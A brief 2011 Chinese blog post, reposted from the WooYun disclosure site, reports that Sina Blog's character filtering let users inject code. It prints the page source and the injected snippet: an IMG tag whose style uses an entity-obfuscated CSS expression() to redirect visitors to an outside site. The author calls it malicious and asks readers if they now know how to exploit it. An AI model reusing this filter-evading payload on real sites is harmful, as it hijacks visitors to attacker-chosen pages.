新浪博客字符过滤不严导致执行任意代码

December 28, 2011 | tags 新浪博客  字符过滤  执行代码  网络快讯   | views
Comments 0

案例:
示例博客:http://blog.sina.com.cn/u/2439749250
是新浪的博客,其中插入一段代码,新浪并没有过滤,导致可以直接跳转

跳转到:


网页源码:
<!-- START Nielsen//NetRatings SiteCensus V5.2 -->
<!-- COPYRIGHT 2006 Nielsen//NetRatings -->
<script type="text/javascript">
 var _rsCI="cn-sina2006";
 var _rsCG="0";
 var _rsDN="//secure-cn.imrworldwide.com/";
 var _rsCC=0;
 var _rsSE=1;
 var _rsSM=0.01;
 var _rsSS=1500;
</script>
<script type="text/javascript" src="//secure-cn.imrworldwide.com/v52.js"></script>
<noscript><img src="//secure-cn.imrworldwide.com/cgi-bin/m?ci=cn-sina2006&cg=0" alt=""/> </noscript>
<!-- END Nielsen//NetRatings SiteCensus V5.2 -->
</html>

其中导致直接跳转的部分为:
</div>
            <div class="SG_connBody">
             <div class="diywidget"><DIV CLASS="SG_connBody"><DIV CLASS="diywidget"><IMG STYLE="x&#58;expr&#101;ssion(if(window.r!=1){window.r=1; wi&#110;dow.locatio&#110;.href=&#34; http://www.zzpbz.com&#34;})" /></DIV></DIV></div>            </div>       
            <div class="SG_connFoot"></div>
 </div>

上述代码即为恶意代码!同志们,知道怎么利用了么?上述的例子……

版权声明:转载请注明来源@乌云

 


原创文章如转载,请注明:转载自常州SEO-网站推广优化-iitding
原文地址:http://www.dingseo.com.cn/post/243.html





发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。